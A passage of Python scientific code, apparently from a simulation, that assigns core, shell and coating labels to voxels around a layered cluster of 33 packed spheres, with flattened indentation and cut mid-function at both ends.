div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
##################################################################################################################################
###########################################################################################################################
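# hex8: same per-voxel core/shell test, applied to a 33-sphere cluster: a base
# layer of 19 centres (shifted by +1*radiusc/dl in y with respect to hex6/hex7)
# at z = radiusc/dl, then layers of 7, 4, 2 and 1 centres at z = 3, (3+sqrt(3)),
# (3+2*sqrt(3)) and (3+3*sqrt(3)) times radiusc/dl.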
def hex8 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
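    # a,b: same grid-to-matrix index mapping as in hex6 (b = j + (k-1)*Dy1)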
xx1=((6)*radiusc/dl-i+1)
yy1= ((6+1)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= ((6+1)*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= ((6+1)*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((8+1+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((4+1-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((6.0+1)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((6.0+1)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((6+1-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((6+1+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((11+1-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((11+1-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((1+1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((1+1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
    # second layer of sphere centres (7 centres at z = 3*radiusc/dl)
xx20 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy20 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz20 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx21 = (5*(radiuscore + (radiusc-radiuscore))/dl-i);
yy21 = ((7-sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz21 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx22 = (7*(radiuscore + (radiusc-radiuscore))/dl-i);
yy22 = ((7-sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz22 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx23 = (5*(radiuscore + (radiusc-radiuscore))/dl-i);
yy23 = ((7+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz23 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx24 = (7*(radiuscore + (radiusc-radiuscore))/dl-i);
yy24 = ((7+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-j);
zz24 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx25 = (4*(radiuscore + (radiusc-radiuscore))/dl-i);
yy25 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz25 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx26 = (8*(radiuscore + (radiusc-radiuscore))/dl-i);
yy26 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz26 = (3*(radiuscore+(radiusc-radiuscore))/dl-k+1);
    # third layer of sphere centres (4 centres at z = (3+sqrt(3))*radiusc/dl)
xx27 = (5*(radiuscore + (radiusc-radiuscore))/dl-i);
yy27 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz27 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx28 = (7*(radiuscore + (radiusc-radiuscore))/dl-i);
yy28 = (7*(radiuscore+(radiusc-radiuscore))/dl-j);
zz28 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx29 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy29 = ((8.0+sqrt(2.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz29 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx30 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy30 = ((6.0-sqrt(2.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz30 = ((3+sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
    # fourth layer of sphere centres (2 centres at z = (3+2*sqrt(3))*radiusc/dl)
xx31 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy31 = ((7.0-sqrt(3.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz31 = ((3+2*sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
xx32 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy32 = ((7.0+sqrt(3.0)/2)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz32 = ((3+2*sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
    # fifth layer: single top sphere at z = (3+3*sqrt(3))*radiusc/dl
xx33 = (6*(radiuscore + (radiusc-radiuscore))/dl-i);
yy33 = ((7.0)*(radiuscore+(radiusc-radiuscore))/dl-j);
zz33 = ((3+3*sqrt(3.0))*(radiuscore+(radiusc-radiuscore))/dl-k+1);
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
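    # cc: normalised squared distance to sphere centre 1, as in hex6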
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
    # print('here')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx27/(div))**2+(yy27/(div))**2+(zz27/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx28/(div))**2+(yy28/(div))**2+(zz28/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
